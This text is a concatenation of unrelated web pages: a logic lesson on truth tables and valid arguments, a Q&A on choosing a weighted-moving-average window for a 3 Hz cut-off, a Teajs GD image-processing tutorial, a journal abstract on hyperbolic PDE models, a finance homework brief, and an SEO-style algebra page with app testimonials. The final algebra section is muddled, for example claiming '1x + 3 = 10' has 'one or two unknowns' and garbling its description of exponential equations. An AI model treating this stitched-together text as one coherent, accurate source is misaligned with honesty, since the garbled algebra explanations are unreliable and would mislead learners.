1. If Peter makes an A in his geometry class, he will spend the summer in the Caribbean. If he goes to the Caribbean, he gets to go to the summer festival. If he goes to the summer festival, he will perform with the band. What conclusion can be drawn from these premises?

Therefore, if Peter makes an A in his geometry class, he will perform with the band at the summer festival in the Caribbean.

Truth Tables

Earlier in the lesson you learned how conditional, converse, inverse, and contrapositive statements can be equivalent. Now we are going to verify which ones are equivalent by using a truth table. A truth table shows all the possibilities in a given situation.

It is raining.

You get wet.

Both of these statements can either be true or false. Assign the letter p to the first statement: "it is raining." The second statement, "you get wet," will be the letter q. Now we will put these two statements together as a conditional statement.

If it is raining, then you get wet.

In symbolic form this is written:

p → q

A truth table is a way to display all the possibilities about whether either of those statements are true. It shows the original, converse, inverse, and contrapositive.
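The rows of a truth table can also be generated programmatically. The short Python sketch below (the helper name `implies` is my own, not part of the lesson) enumerates every combination of truth values for p and q and evaluates p → q for each row, matching the tables worked out by hand in this section:

```python
from itertools import product

def implies(p, q):
    # Material implication: p -> q is false only when p is true and q is false.
    return (not p) or q

# Enumerate all four combinations of truth values for p and q,
# in the same row order the lesson's truth tables use (TT, TF, FT, FF).
for p, q in product([True, False], repeat=2):
    print(p, q, implies(p, q))
```

Running the loop prints T, F, T, T in the last column, the same truth values as the p → q table.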
First look at a truth table for the two parts of the conditional statement above:

| p | q |
| --- | --- |
| True | True |
| True | False |
| False | True |
| False | False |

Notice that there are four possible combinations of true and false for p and q. Now look at the possibilities for the whole statement, p → q. (From now on we will use T for true and F for false.) The third column gives what is called the truth value of a statement. The only time that p → q is false is when p is true and q is false. In other words, a true first term, or premise, cannot imply a false conclusion.

| p | q | p → q |
| --- | --- | --- |
| T | T | T |
| T | F | F |
| F | T | T |
| F | F | T |

In the first case, T → T. If both of the statements--that it is raining and that you get wet--are true statements, then the conditional statement is true. So, the truth value of this is T.

The second case is T → F. This means that the first statement, it is raining, is true, but the second statement, that you get wet, is not. If this is the case, the conditional statement cannot be true. The truth value here is F, false.

In the third case, F → T. Here, the first statement is not true, so it is not raining. The second statement, you get wet, is true. In this case, the truth value is T, because we do not have enough information to know that it is false.

In the fourth case, F → F. In this case, the first and second statements are both false. As with the example above, since we do not have any information about what happens when it is not raining, the statement cannot be proven false. Here, the truth value is T.

Negation

The symbol for negation (or "not") is a tilde (~). If we want to show that a statement p has been negated, we write ~p. The truth table for negation is the following:

| p | ~p |
| --- | --- |
| T | F |
| F | T |

Negation causes a true statement to become false and a false one to become true. Say the original statement is "10 plus 5 equals 15." This is true. The negation of this statement is "10 plus 5 does not equal 15." This is false.
In another example, the original statement is "A pig is a horse." This is false. The negation of this statement is "A pig is not a horse." This is true.

Conjunction

Another symbol that we use in truth tables is the conjunction or "and" symbol (∧). If we want to connect the statements p and q with the word and, we write it as p ∧ q.

Look back at the example above. We will connect the statements with a conjunction:

It is raining and you get wet.

p ∧ q

The truth table for conjunctions is the following:

| p | q | p ∧ q |
| --- | --- | --- |
| T | T | T |
| T | F | F |
| F | T | F |
| F | F | F |

Look at an example. Check to see if the conjunction statement is true based on the truth table:

Green is a color and 4 + 5 = 9.

Look at the table. Both of these statements are true. Based on the first row of the table, the entire sentence is true.

Now look at a similar statement:

Green is a color and 4 + 5 = 10.

Since the first statement is true and the second is false, the entire sentence is false.

Example 12

Use the truth table above to state the truth value of the sentence below.

An apple is a vegetable and 18 - 5 = 13.

The first statement is false--an apple is not a vegetable.

The second statement is true.

Since the first statement is false and the second is true, the entire sentence is false.

Example 13

Use the truth table above to state the truth value of the sentence below.

An apple is a vegetable and 18 - 5 = 10.

The first statement is false.

The second statement is also false.

Since the first statement is false and the second is false, the entire sentence is false.

Notice that the only time p ∧ q is true is when both p and q are true.

Practice

1-4. Determine the truth value of the following sentences.

1. 5 + 7 = 12 and 5 is an even number.

The first statement is true, but the second statement is false. Therefore, the whole sentence is false.

2.
London is the capital of England and Paris is the capital of France.

The first statement is true, and the second statement is true. Therefore, the whole sentence is true.

3. Eleven is not a prime number and there are five sides in a pentagon.

The first statement is false, though the second statement is true. Therefore, the whole statement is false.

4. The opposite sides of a trapezoid are always equal and there are 350° in a circle.

The first statement is false and the second statement is false, so the whole statement is false.

Equivalent Statements

Look again at the statements we have been using:

p: It is raining.

q: You get wet.

We can use this statement and truth tables to show which statements are equivalent.

A. Conditional statement:

If it is raining, then you get wet.

p → q

We have seen this truth table before.

| p | q | p → q |
| --- | --- | --- |
| T | T | T |
| T | F | F |
| F | T | T |
| F | F | T |

B. Converse statement:

If you get wet, then it is raining.

q → p

Notice that the p and q have been switched. The truth table looks like the following:

| I: p | II: q | III: q → p |
| --- | --- | --- |
| T | T | T |
| T | F | T |
| F | T | F |
| F | F | T |

We have labeled the columns with Roman numerals. In order to get column III, you must do column II → column I. Notice that the results are different from A.

C. Inverse statement:

If it is not raining, then you do not get wet.

~p → ~q

Because p and q have been negated, you have to put the negation columns in the truth table. Columns III and IV are used to form column V.

| I: p | II: q | III: ~p | IV: ~q | V: ~p → ~q |
| --- | --- | --- | --- | --- |
| T | T | F | F | T |
| T | F | F | T | T |
| F | T | T | F | F |
| F | F | T | T | T |

D. Contrapositive statement:

If you do not get wet, then it is not raining.

~q → ~p

Notice that the p and q have been switched and negated. We must put in the negation columns.
In order to get column V, you must do column IV → column III.

| I: p | II: q | III: ~p | IV: ~q | V: ~q → ~p |
| --- | --- | --- | --- | --- |
| T | T | F | F | T |
| T | F | F | T | F |
| F | T | T | F | T |
| F | F | T | T | T |

Notice that the last column in the conditional (A) and the contrapositive (D) tables are the same. Therefore, we say that they are equivalent statements. Also, the last column in the converse (B) and the inverse (C) tables are the same. Therefore, they are equivalent.

Validity of an Argument

Truth tables can also be used to determine the validity of an argument. An argument consists of premises (hypotheses) and a conclusion. The premises are connected with the word "and" (shown with the symbol ∧).

Look at an example of an argument.

Premises: If the rain stops, I go outside. The rain stops.

Conclusion: I go outside.

Write the statements with symbols.

p: The rain stops.

q: I go outside.

Put the premises together with the symbol for a conjunction (∧).

(p → q) ∧ p

The conclusion is q. The premises and conclusion are stated as an implied (→) statement.

[(p → q) ∧ p] → q

Let's build a truth table to look at this statement.

| p | q | p → q | (p → q) ∧ p | [(p → q) ∧ p] → q |
| --- | --- | --- | --- | --- |

Notice that we start with p and q and build from there. The last column is the final statement. Now we will fill in the truth table, using the four possibilities.

| I: p | II: q | III: p → q | IV: (p → q) ∧ p | V: [(p → q) ∧ p] → q |
| --- | --- | --- | --- | --- |
| T | T | T | T | T |
| T | F | F | F | T |
| F | T | T | F | T |
| F | F | T | F | T |

Column III is formed by using the rules for → (implied): III = I → II.

Column IV is formed by using the rules for ∧ (and): IV = III ∧ I.

Column V is formed by using the rules for → (implied): V = IV → II.

In the last column (V), the results are all true.
When this happens it is called a tautology, and the argument is valid.

Look at another argument.

If it is raining, then I am reading.

I am reading.

Therefore, it is raining.

p: It is raining.

q: I am reading.

Premises: p → q, q

Conclusion: p

Argument: [(p → q) ∧ q] → p

Now set up the truth table:

| I: p | II: q | III: p → q | IV: (p → q) ∧ q | V: [(p → q) ∧ q] → p |
| --- | --- | --- | --- | --- |
| T | T | T | T | T |
| T | F | F | F | T |
| F | T | T | T | F |
| F | F | T | F | T |

Column III is formed by using the rules for → (implied): III = I → II.

Column IV is formed by using the rules for ∧ (and): IV = III ∧ II.

Column V is formed by using the rules for → (implied): V = IV → I.

In the last column (V), the results are not all true. Therefore, the argument is not valid. Here is another argument.

Example 14

Construct and describe a truth table about the following argument.

If wool is expensive, then sweaters are expensive.

Sweaters are not expensive.

Therefore, wool is not expensive.

p: Wool is expensive.

q: Sweaters are expensive.

Premises: p → q, ~q

Conclusion: ~p

Argument: [(p → q) ∧ ~q] → ~p

Notice that there are negations needed here. Add negation columns to the truth table.

| I: p | II: q | III: ~p | IV: ~q | V: p → q | VI: (p → q) ∧ ~q | VII: [(p → q) ∧ ~q] → ~p |
| --- | --- | --- | --- | --- | --- | --- |
| T | T | F | F | T | F | T |
| T | F | F | T | F | F | T |
| F | T | T | F | T | F | T |
| F | F | T | T | T | T | T |

Columns III and IV are formed by negating columns I and II.

Column V is formed by using the rules for → (implied): V = I → II.

Column VI is formed by using the rules for ∧ (and): VI = V ∧ IV.

Column VII is formed by using the rules for → (implied): VII = VI → III.

The last column is all true. Therefore, the argument is valid.

Practice

1.
Construct and explain a truth table about the following argument.

If John does not go to town, then Marty stays home.

John goes to town.

Therefore, Marty does not stay home.

p: John goes to town.

q: Marty stays home.

Premises: ~p → q, p

Conclusion: ~q

Argument: [(~p → q) ∧ p] → ~q

| I: p | II: q | III: ~p | IV: ~q | V: ~p → q | VI: (~p → q) ∧ p | VII: [(~p → q) ∧ p] → ~q |
| --- | --- | --- | --- | --- | --- | --- |
| T | T | F | F | T | T | F |
| T | F | F | T | T | T | T |
| F | T | T | F | T | F | T |
| F | F | T | T | F | F | T |

Columns III and IV are formed by negating columns I and II.

Column V is formed by using the rules for → (implied): V = III → II.

Column VI is formed by using the rules for ∧ (and): VI = V ∧ I.

Column VII is formed by using the rules for → (implied): VII = VI → IV.

The last column is not all true. Therefore, the argument is not valid.

Enrichment Activity

Research the history of geometry. There are many resources that contain information on how geometry was first used by the Babylonians, Egyptians, Hindus, Chinese, and Greeks. Famous mathematicians such as Euclid, Archimedes, Thales, and Pythagoras were instrumental in the development of geometry. Do some reading on these ancient times and mathematicians, and write a summary of what you have learned. One possible resource is a book titled Great Moments in Mathematics Before 1650 by Howard Eves, published by the Mathematical Association of America.

Lesson Review & Homework

We started this lesson by defining conditional statements, also known as if … then statements. A conditional statement is made up of a hypothesis and a conclusion. Then, we defined converse, inverse, and contrapositive statements. The lesson also covered which of these statements are logically equivalent--that is, they mean the same thing. The converse and inverse statements are equivalent. The conditional and contrapositive are equivalent.

You used this information when applying deductive reasoning and finding syllogisms, which are used to form a true conclusion from given premises.
You learned about truth tables. You also learned how to use them to understand negation, conjunctions, and the validity of arguments. This kind of logical thinking will be the basis for much of the work you will do as you explore geometry.

Homework

1. Identify the hypothesis and conclusion of each of the following conditional statements. Rewrite any statement that is not already in the if… then form.

a. If the geese are flying south, then winter is on its way.

b. If you study hard, then you will achieve success.

c. The diameter of a circle is 14 inches if the radius of the circle is 7 inches.

d. Those that live in Florida do not have to pay a state income tax.

e. A scalene triangle has no sides of equal length.

2. Identify the relation of the following statements to the original statement below:

The grass will grow if it rains.

a. If it doesn't rain, the grass will not grow.

b. If the grass grows, then it rained.

3. Write the converse of the statement below. Is it a good definition of what it means for an animal to be extinct? Why or why not?

If a type of animal is extinct, then there are no animals of that type left on Earth.

4. Determine if the following pairs of premises form a syllogism. If they do, state the conclusion.

p → q

r → q

5. Determine if the following pairs of premises form a syllogism. If they do, state the conclusion.

p → q

r → p

6. Determine if the following pairs of premises form a syllogism. If they do, state the conclusion.

x → y

z → ~y

7. Determine if the following pairs of premises form a syllogism. If they do, state the conclusion.

~r → ~s

s → t

8. Form the negation of each statement.

a. The sky is cloudy.

b. The Pittsburgh Steelers football team is not the team with the most Super Bowl wins.

c. Josie is the only person with red hair.

9. Let p and q represent the following simple statements.
Write each sentence below in symbolic form.

p: This is a cow.

q: This is a mammal.

a. If this is a cow, then this is a mammal.

b. If this is a mammal, then this is a cow.

c. If this is not a mammal, then this is not a cow.

10. Let q and r represent the following simple statements. Write each symbolic statement below in words.

q: It is Memorial Day.

r: There will be fireworks.

a. q ∧ ~r

b. r → ~q

c. ~r ∧ ~q

d. ~q → ~r

11. Use truth tables to show that q → p and ~p → ~q are equivalent.

12. By using a truth table, determine the validity of the following argument:

If we turn off the TV, there will be less noise.

There is less noise.

Therefore, we turned off the TV.
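Truth-table checks like the worked argument above can also be carried out mechanically. The following standalone Python sketch (my own illustration, not part of the lesson) enumerates all truth assignments for the worked example and confirms that the final column is not all true:

```python
from itertools import product

def implies(a, b):
    # Material implication: a -> b is false only when a is true and b is false.
    return (not a) or b

rows = []
for p, q in product([True, False], repeat=2):
    premise = implies(not p, q) and p    # (~p -> q) ^ p
    argument = implies(premise, not q)   # [(~p -> q) ^ p] -> ~q
    rows.append(argument)

# The argument is valid only if the final column is true in every row.
print(rows)        # [False, True, True, True]
print(all(rows))   # False, so the argument is not valid
```

The first row (p true, q true) is the counterexample: both premises hold, yet the conclusion ~q is false.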
https://dsp.stackexchange.com/questions/9590/how-to-determine-the-window-size-and-weights-in-weighted-moving-average-wma-g
# How to determine the window size and weights in Weighted Moving Average (WMA), given a desired cut-off frequency?

I am trying to smooth my discrete-time data points using a WMA.

Currently, I am using n as the window size and the weight array {n/(n(n+1)/2), (n-1)/(n(n+1)/2), ..., 1/(n(n+1)/2)}.

If the y-value of each point were irrelevant, I could simply choose my size n at random. However, in my case I want to preserve the original values of the data points as far as possible, so I cannot choose a window so large that it averages everything flat.

My cut-off frequency is 3 Hz and the sampling rate is 50 Hz. How should I choose the window size n?

Your normalized window is given by

$$w(n)=\frac{2}{N+1}\frac{N-n}{N},\quad n=0,1,\ldots,N-1$$

The window satisfies

$$\sum_{n=0}^{N-1}w(n)=1$$

which means that the gain of the corresponding moving average filter is 1 at DC.

For determining the cut-off frequency, we need to compute the frequency response of the window:

$$W(e^{j\theta})=\sum_{n=0}^{N-1}w(n)e^{-jn\theta}$$

After some algebra you get

$$W(e^{j\theta})=\frac{2}{N+1}\frac{1-\frac{N+1}{N}e^{-j\theta}+\frac{1}{N}e^{-j(N+1)\theta}}{(1-e^{-j\theta})^2}\tag{1}$$

Now you need to find the value of $N$ for which the magnitude of (1) at the cut-off frequency $\theta_c=2\pi\frac{3\,\text{Hz}}{50\,\text{Hz}}$ becomes $1/\sqrt{2}$ (-3 dB). Since $N$ must be an integer you cannot hit any desired cut-off frequency exactly, but the given cut-off is approximately achieved by $N=9$, for which $|W(e^{j\theta_c})|=0.698$ (-3.13 dB).

• Thank you so much for the detailed calculation. I made a mistake just now and have modified my weight array. Could you please edit your answer according to my updated weight array? I am really new to filter design and cannot duplicate your working process. – Sibbs Gambling Jun 14 '13 at 8:43
• This is exactly the window I assumed you would be using. It now also includes the normalization factor I suggested, so the answer is correct as it stands. If you're happy with it, please accept the answer (by hitting the check mark button) to show that your question has been answered satisfactorily. – Matt L. Jun 14 '13 at 8:48
• How does the expression above (1) come about? Also, can I say that my values within 3 Hz are preserved (remain exactly the same)? I need to use the max and min values of the series, so if the values are distorted after the filter, I will have to do something else. – Sibbs Gambling Jun 17 '13 at 6:00
• Another question: if I find by experiment that a bigger value of N actually gives better performance, what are the effects of raising N? Say the calculation shows I should take N as 9; if I use 30 instead, will the cutoff frequency vary? Will the frequency response within 3 Hz remain 1? Actually I do not need the frequency response to be 1; as long as the max and min are scaled by the same constant, that will be sufficient. – Sibbs Gambling Jun 17 '13 at 6:12
• If you increase $N$, the cutoff frequency will decrease, because you apply more averaging. You can plot the magnitude of (1) for different values of N to see the effect. Take a grid of frequencies $\theta\in [0,\pi]$, where $\pi$ corresponds to half the sampling rate, and compute $|W(e^{j\theta})|$ for different values of $N$. – Matt L. Jun 17 '13 at 6:50
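The claimed value for N = 9 can be checked numerically by evaluating the window's frequency response directly from its definition rather than from the closed form (1). A quick standard-library-only Python sketch:

```python
import cmath
import math

def wma_response(N, theta):
    """Frequency response of the normalized triangular WMA window
    w(n) = 2/(N+1) * (N-n)/N, evaluated at digital frequency theta."""
    w = [2.0 / (N + 1) * (N - n) / N for n in range(N)]
    return sum(wn * cmath.exp(-1j * n * theta) for n, wn in enumerate(w))

theta_c = 2 * math.pi * 3.0 / 50.0   # 3 Hz cut-off at a 50 Hz sampling rate

# DC gain is 1 because the weights sum to 1.
assert abs(wma_response(9, 0.0) - 1.0) < 1e-12

mag = abs(wma_response(9, theta_c))
print(round(mag, 3))   # 0.698, i.e. about -3.13 dB
```

Sweeping N over a range and picking the value whose magnitude at theta_c is closest to 1/sqrt(2) reproduces the N = 9 recommendation.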
http://www.puritys.me/docs-blog/article-141-Teajs-GD-library-tutorial.html
2012 Aug 02

# Teajs GD library tutorial

Tags:

The main purpose of the GD extension is image processing. Simple operations include shrinking, enlarging, and cropping images, and it can also be used to create images. This article implements image resizing, rotation, and sharpening.

## Installing the Teajs GD Extension

g++ -shared -lgd -lpthread -lv8 -lrt -ldl -o gd.so ~/gd.o ../binary/bytestorage.os ../../common.os ../../app.os ../../path.os ../../cache.os

## Drawing with JavaScript GD

TrueColor is an image format stored in 32 bits: each of the three primary colors in RGB uses 8 bits, so each channel stores a value from 0 to 255, giving 256^3 possible combinations, plus an 8-bit alpha (transparency) channel.

JPEG uses the TrueColor format, while GIF uses a palette format, so GIF only has 256 usable colors. PNG supports both TrueColor and palette.

## Arthas before resizing

## Arthas after resizing

## Resize example

Resize.sjs

```js
var Image = require('gd').Image;
var source = "Arthas-H.jpg";
var img = resize(source, 100, 150);
img.save(Image.PNG, "tmp.png");

function resize(img, to_w, to_h) {
    var pos = img.lastIndexOf('.');
    var ext = img.substring(pos + 1, img.length);
    var type = Image.JPEG;
    switch (ext.toLowerCase()) {
        case 'jpeg': case 'jpg': type = Image.JPEG; break;
        case 'png': type = Image.PNG; break;
        case 'gif': type = Image.GIF; break;
    }
    var source_img = new Image(type, img);
    var w = source_img.sx();
    var h = source_img.sy();
    var image = new Image(Image.TRUECOLOR, to_w, to_h);
    var destx = 0, desty = 0;
    var srcx = 0, srcy = 0;
    image = image.copyResized(source_img, destx, desty, srcx, srcy, to_w, to_h, w, h);
    return image;
}
```

## Arthas before rotation

## Arthas after rotation

## How rotation works

Note: the mathematical definition of rotation rotates the coordinate axes counter-clockwise, which means the coordinate points rotate clockwise, so the computed result differs slightly.

• From the figure, the radius is z = sqrt(x1² + y1²)
• x2 = z × cos(θ1 + θ2) = z × (cos θ1 × cos θ2 − sin θ1 × sin θ2)
• Since cos θ1 = x1/z and sin θ1 = y1/z,
• we get x2 = x1 × cos θ2 − y1 × sin θ2
• The same approach gives y2 = y1 × cos θ2 + x1 × sin θ2

## Rotate example

Rotate.sjs

```js
var Image = require('gd').Image;
var source = "Arthas-H.jpg";
var img = rotate(source, 10);
img.save(Image.PNG, "tmp.png");

function rotate(img, angle) {
    var PI = Math.PI;
    var radian = PI * angle / 180;
    var pos = img.lastIndexOf('.');
    var ext = img.substring(pos + 1, img.length);
    var type = Image.JPEG;
    switch (ext.toLowerCase()) {
        case 'jpeg': case 'jpg': type = Image.JPEG; break;
        case 'png': type = Image.PNG; break;
        case 'gif': type = Image.GIF; break;
    }
    var source_img = new Image(type, img);
    var w = source_img.sx();
    var h = source_img.sy();
    var p2x = w / 2, p2y = h / 2;
    // Extra width/height needed so the rotated image is not clipped
    var diffw = Math.abs(p2x * Math.cos(radian) + p2y * Math.sin(radian)) - Math.abs(p2x);
    diffw = 2 * Math.abs(diffw);
    var diffh = Math.abs(-p2x * Math.sin(radian) + p2y * Math.cos(radian)) - Math.abs(p2y);
    diffh = 2 * Math.abs(diffh);
    var newH = h + diffh;
    var newW = w + diffw;
    var image = new Image(Image.TRUECOLOR, newW, newH);
    var destx = newW / 2, desty = newH / 2;  // rotate around the center
    var srcx = 0, srcy = 0;
    image = image.copyRotated(source_img, destx, desty, srcx, srcy, w, h, angle);
    return image;
}
```

## Arthas, normal

## Arthas after sharpening

## Sharpen example

sharpen.sjs

```js
var Image = require('gd').Image;
var source = "Arthas-H.jpg";
var img = sharpen(source, 150);
img.save(Image.PNG, "tmp.png");

function sharpen(img, percent) {
    var pos = img.lastIndexOf('.');
    var ext = img.substring(pos + 1, img.length);
    var type = Image.JPEG;
    switch (ext.toLowerCase()) {
        case 'jpeg': case 'jpg': type = Image.JPEG; break;
        case 'png': type = Image.PNG; break;
        case 'gif': type = Image.GIF; break;
    }
    var source_img = new Image(type, img);
    var data = source_img.sharpen(percent);
    return data;
}
```
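The rotation identities derived above (x2 = x1·cos θ − y1·sin θ and y2 = y1·cos θ + x1·sin θ) can be sanity-checked with a short standalone Python sketch. This is my own illustration and not part of the GD API:

```python
import math

def rotate_point(x1, y1, theta):
    """Rotate (x1, y1) by theta radians using the identities from the article:
    x2 = x1*cos(theta) - y1*sin(theta), y2 = y1*cos(theta) + x1*sin(theta)."""
    x2 = x1 * math.cos(theta) - y1 * math.sin(theta)
    y2 = y1 * math.cos(theta) + x1 * math.sin(theta)
    return x2, y2

# Rotating (1, 0) by 90 degrees gives (0, 1), and the radius z is preserved.
x2, y2 = rotate_point(1.0, 0.0, math.pi / 2)
assert abs(x2) < 1e-12 and abs(y2 - 1.0) < 1e-12
assert abs(math.hypot(*rotate_point(3.0, 4.0, 0.7)) - 5.0) < 1e-12
print("rotation identities check out")
```

Preserving the radius is exactly the property the derivation relies on: z = sqrt(x1² + y1²) stays constant while only the angle changes.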
https://www.amcs.uz.zgora.pl/?action=paper&paper=1565
# International Journal of Applied Mathematics and Computer Science

Paper details

Volume 30, Number 3 - September 2020

Approximate state-space and transfer function models for 2x2 linear hyperbolic systems with collocated boundary inputs

Krzysztof Bartecki

Abstract

Two approximate representations are proposed for distributed parameter systems described by two linear hyperbolic PDEs with two time- and space-dependent state variables and two collocated boundary inputs. Using the method of lines with the backward difference scheme, the original PDEs are transformed into a set of ODEs and expressed in the form of a finite number of dynamical subsystems (sections). Each section of the approximation model is described by state-space equations with matrix-valued state, input and output operators, or, equivalently, by a rational transfer function matrix. The cascade interconnection of a number of sections results in the overall approximation model expressed in finite-dimensional state-space or rational transfer function domains, respectively. The discussion is illustrated with a practical example of a parallel-flow double-pipe heat exchanger. Its steady-state, frequency and impulse responses obtained from the original infinite-dimensional representation are compared with those resulting from its approximate models of different orders. The results show better approximation quality for the "crossover" input-output channels where the in-domain effects prevail as compared with the "straightforward" channels, where the time-delay phenomena are dominating.

Keywords: distributed parameter system, hyperbolic equations, approximation model, state space, transfer function
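The method-of-lines discretization mentioned in the abstract can be illustrated on a much simpler case. The sketch below is my own toy example, not the paper's 2x2 model: it semi-discretizes the scalar transport equation u_t + v·u_x = 0 with a backward difference in space, turning the PDE into a finite set of ODEs that is then integrated with explicit Euler:

```python
# Method of lines for u_t + v*u_x = 0 on x in [0, 1] with boundary input u(0, t).
# Backward differences in space give N coupled ODEs:
#   du_i/dt = -v * (u_i - u_{i-1}) / dx,   i = 1..N

def step(u, u_in, v, dx, dt):
    """Advance the semi-discretized state one explicit-Euler step."""
    new = u[:]
    prev = u_in                  # boundary input feeds the first node
    for i in range(len(u)):
        new[i] = u[i] - dt * v * (u[i] - prev) / dx
        prev = u[i]              # use the old neighbor value (explicit scheme)
    return new

N, v, dx, dt = 50, 1.0, 1.0 / 50, 0.01   # CFL number v*dt/dx = 0.5, stable
u = [0.0] * N                            # zero initial condition
for _ in range(2000):                    # constant boundary input u(0, t) = 1
    u = step(u, 1.0, v, dx, dt)

# Once the constant input has propagated through, the steady state is u = 1.
print(max(abs(ui - 1.0) for ui in u))
```

Each spatial node here plays the role of one "section" of the cascade: its state depends only on itself and the upstream node, which is why the overall model factors into a chain of low-order subsystems.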
https://collegenursingassignments.com/2020/11/26/m2-a2-finance-2/
# m2 a2 finance

Assignment 2: Time Value of Money

When the Genesis Energy and Sensible Essentials teams held their weekly meeting, the time value of money and its applicability yielded an extremely stimulating discussion. However, most of the team members from Genesis Energy were very perplexed. Sensible Essentials decided the most expedient way to demonstrate how interest rates as well as time impact the value of money was to use examples. You have been asked to prepare a report analyzing your findings of the three example calculations listed below.

In this assignment, you will do the following:

1. Calculate the future value of $100,000 ten years from now based on the following annual interest rates:
   1. 2%
   2. 5%
   3. 8%
   4. 10%
2. Calculate the present value of a stream of cash flows based on a discount rate of 8%. Annual cash flow is as follows:
   1. Year 1 = $100,000
   2. Year 2 = $150,000
   3. Year 3 = $200,000
   4. Year 4 = $200,000
   5. Year 5 = $150,000
   6. Years 6-10 = $100,000
3. Calculate the present value of the cash flow stream in problem 2 with the following interest rates:
   1. Year 1 = 8%
   2. Year 2 = 6%
   3. Year 3 = 10%
   4. Year 4 = 4%
   5. Year 5 = 6%
   6. Years 6-10 = 4%

Perform your calculations in an Excel spreadsheet. Copy the calculations in a Word document. In addition, write a 2- to 3-page executive summary in Word format. Your summary should reflect a proper analysis of your findings, including a comparison and contrast of data. Apply APA standards to citation of sources. Use the following file naming convention: LastnameFirstInitial_M2_A2.doc.

By Wednesday, September 21, 2016, deliver your assignment to the M2: Assignment 2 Dropbox.

| Assignment 2 Grading Criteria | Maximum Points |
|---|---|
| Calculated the future value of $100,000 ten years from now based on an annual interest rate of a) 2%, b) 5%, c) 8%, and d) 10%. | 24 |
| Calculated the present value of a stream of cash flows based on a discount rate of 8%. | 24 |
| Calculated the present value of the cash flow stream in problem 2 with the interest rates listed in the directions. | 24 |
| Summarized the findings of the analysis, including the comparison and contrast of data. | 8 |
| Wrote in a clear, concise, and organized manner; demonstrated ethical scholarship in accurate representation and attribution of sources; displayed accurate spelling, grammar, and punctuation. | 20 |
| Total | 100 |
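Calculations 1 and 2 follow directly from the standard formulas FV = PV·(1 + r)^n and PV = Σ CF_t/(1 + r)^t. A minimal Python sketch (the numbers are computed from these formulas, not taken from any solution key):

```python
def future_value(pv, rate, years):
    """Compound a present value forward: FV = PV * (1 + r)^n."""
    return pv * (1 + rate) ** years

def present_value(cash_flows, rate):
    """Discount a stream of year-end cash flows at a single rate:
    PV = sum(CF_t / (1 + r)^t) for t = 1..n."""
    return sum(cf / (1 + rate) ** t for t, cf in enumerate(cash_flows, start=1))

# Problem 1: future value of $100,000 in ten years at each rate.
for r in (0.02, 0.05, 0.08, 0.10):
    print(f"{r:.0%}: {future_value(100_000, r, 10):,.2f}")

# Problem 2: present value of the cash flow stream at 8%.
flows = [100_000, 150_000, 200_000, 200_000, 150_000] + [100_000] * 5
print(f"PV at 8%: {present_value(flows, 0.08):,.2f}")
```

Problem 3 only requires generalizing `present_value` so each year's cash flow is discounted at that year's own rate.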
http://qs1969.pair.com/~perl2/?node_id=78994;displaytype=xml
note by perlmonkey:

To implement it using your syntax you could do something like:

    sub operate (&@) {
        my $sub = shift;
        local $~;
        $~ = &$sub($_) for @_;
        return $~;
    }

So for your examples you would get:

    use strict;

    sub operate (&@) {
        my $sub = shift;
        local $~;
        $~ = &$sub($_) for @_;
        return $~;
    }

    my @list = (4, 6, 2, 67, 123, 645, 23, 54);

    my $max = operate { $~ > $_ ? $~ : $_ } @list;
    print $max, "\n";

    my $string = operate { $~ . $_ } @list;
    print $string, "\n";

    open FILE, $0;
    my $count = operate { $~ + /operate/ } <FILE>;
    print "Count = $count\n";

And the results are:

    max = 645
    string = 462671236452354
    count = 4
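The operate function above is essentially a fold/reduce: it threads an accumulator ($~) through the list. A standalone Python equivalent (my own translation, reproducing two of the three example results) would be:

```python
from functools import reduce

data = [4, 6, 2, 67, 123, 645, 23, 54]

# Maximum via reduce, like operate { $~ > $_ ? $~ : $_ } @list
maximum = reduce(lambda acc, x: acc if acc > x else x, data)

# String concatenation, like operate { $~ . $_ } @list
joined = reduce(lambda acc, x: acc + str(x), data, "")

print(maximum)  # 645
print(joined)   # 462671236452354
```

The pattern-count example works the same way: the accumulator is a running count instead of a maximum or a string.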
https://esef2018.com/facebook-nachrichten-ohne-messenger/flixbus-dortmund-hamburg.php
# Algebra equations to solve

Algebra equations are used to solve larger mathematical problems. These equations allow you to solve problems in a variety of ways, including substitution, addition, subtraction, and multiplication. Algebra equations are also used to work out percentages and rates.

## The Best Algebra equations to solve

Once you understand how algebra equations work, you can apply this knowledge to different situations. For example, you can use algebra equations when calculating the price of an item or making a budget for food and other expenses. By working with algebra equations on a regular basis, you'll build your skills and knowledge. You'll also be able to see how these equations work in real-world examples. A good place to start is by learning the basics of algebra. You'll learn how to perform simple operations like addition and subtraction as well as how to solve algebra equations. Once you have these skills down, you'll be able to apply them in different situations.

Algebra is used to solve equations. The three main types of algebra equations are linear, quadratic, and exponential. Linear equations involve one or two unknowns; for example, 1x + 3 = 10. Quadratic equations involve a squared unknown; for example, 4x² + 2x + 5 = 25. Exponential equations involve an exponent (e) sign with a base number; for example, 4e-2x = 6. Algebra can be used to solve equations like the following: to solve the equation 5x - 8 = 7, first add 8 to both sides to get 5x = 15, then divide both sides by 5 to get x = 3. Similarly, to solve the equation y - 2 = 3, add 2 to both sides to get y = 5.

Algebra is a mathematical field that focuses on solving problems using formulas. Algebra equations are expressions that can be used to solve problems. Algebra equations can be written on paper, in equations, or as word problems. One common type of algebra equation is an equation with unknowns (also called variables). This type of equation could be used to solve the following types of problems:

• Finding the length of a string
• Finding the volume of a box
• Finding the number of steps it takes to climb a certain number of stairs

Algebra equations can also be written in other ways, such as word problems, by using variables and different symbols. For example, a word problem about how many steps Bill climbed could lead to an algebraic equation such as 4x + 3 = 16. Here the letter "x" represents the unknown, "+" represents addition, and "=" represents equality, which means you need to find the value of x that makes 4x + 3 equal to 16: subtracting 3 from both sides gives 4x = 13, so x = 13/4.

Not only does it resolve your math problems, it also teaches you to solve math! If you're stuck on an algebra problem you can just take a photo or write it out, and it shows you a step-by-step solution plus instructions. Would 100% recommend to everyone!

Stella Perry

Great app for solving math. Everyone should try it if they are weak in math. It is all good; you must try this app. Thank you for giving me your time. It does not have ads, it is better than a normal calculator, and it is free; 100/10, go for it.

Gabriella Powell
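The step-by-step linear solutions described above can be expressed programmatically. This quick sketch of my own solves any equation of the general form ax + b = c, including the worked examples, using exact rational arithmetic:

```python
from fractions import Fraction

def solve_linear(a, b, c):
    """Solve a*x + b = c for x: subtract b from both sides, divide by a."""
    if a == 0:
        raise ValueError("not a linear equation in x")
    return Fraction(c - b, a)

print(solve_linear(5, -8, 7))   # 5x - 8 = 7  ->  x = 3
print(solve_linear(1, -2, 3))   # y - 2 = 3   ->  y = 5
print(solve_linear(4, 3, 16))   # 4x + 3 = 16 ->  x = 13/4
```

Using `Fraction` instead of floating point keeps non-integer answers like 13/4 exact.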
